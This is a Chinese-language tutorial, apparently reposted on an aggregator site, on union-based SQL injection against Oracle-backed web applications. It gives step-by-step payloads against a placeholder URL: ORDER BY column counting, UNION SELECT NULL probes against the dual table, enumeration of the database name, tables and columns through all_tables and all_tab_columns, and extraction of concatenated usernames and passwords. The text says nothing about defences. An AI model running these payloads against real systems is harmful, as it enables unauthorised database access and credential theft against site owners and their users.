C/C++教程

基于Oracle网站的SQL注入

本文主要是介绍基于Oracle网站的SQL注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

基于Oracle网站的SQL注入

参考链接1
参考链接2

  • 使用 order by 语句查询列数
www.vuln-web.com/photo.php?id=1' order by 1--
Working
www.vuln-web.com/photo.php?id=1' order by 10-- 

www.vuln-web.com/photo.php?id=1' order by 7--
Working
www.vuln-web.com/photo.php?id=1' order by 9--
Working
  • 可以得知第9列是最后一列

  • oracle不允许没有 from 子句的 select 语句,有时候我们确实不知道当前的数据库表是哪个的话,ORACLE提供了一个虚表dual,换句话说:在不知道当前的数据库表的情况下使用select查询语句时,可以使用虚表dual。
    1

  • 在真实的注入环境中一般是无法知道后台的数据库表的数据类型的,这时候就可以使用null关键字挨个判断每个数据是字符还是数字类型。
    在这里插入图片描述

www.vuln-web.com/photo.php?id=1' union select null,null,null,null,null,null,null,null,null from dual--
Working fine
  • 然后把每个null替换成数字型或字符型进行测试
    在这里插入图片描述
  • 使用是字符型的那一列,获取我们可以使用的数据库名称
www.vuln-web.com/photo.php?id=1' union select null,ora.database_name,null,null,null,null,null,null,null from dual--

(从 dual 中选择 ora_database_name)
(从 dual 中选择 sys.database_name)
(从global_name 中选择 global_name )

  • 获取我们可以使用的表名: all_tables 中选择 table_name
www.vuln-web.com/photo.php?id=1' union select null,table_name,null,null,null,null,null,null,null from all_tables--
  • 获取我们可以使用的特定表的列(在示例中我使用 user_table):从 all_tab_columns 中选择 column_name 其中 table_name='Your_Table_name_here'
  • 注意表名需要区分大小写
www.vuln-web.com/photo.php?id=1' union select null,column_name,null,null,null,null,null,null,null from all_tab_columns where table_name='user_table'--
  • 从某些列中提取数据,我们可以使用以下查询和 || 作为连接运算符: 从 table_name_here 中选择用户名||密码
  • 但是得到的结果是用户名与密码连在一起的,建议还是分开查询
www.vuln-web.com/photo.php?id=1' union select null,username||password,null,null,null,null,null,null,null from user_table--
这篇关于基于Oracle网站的SQL注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!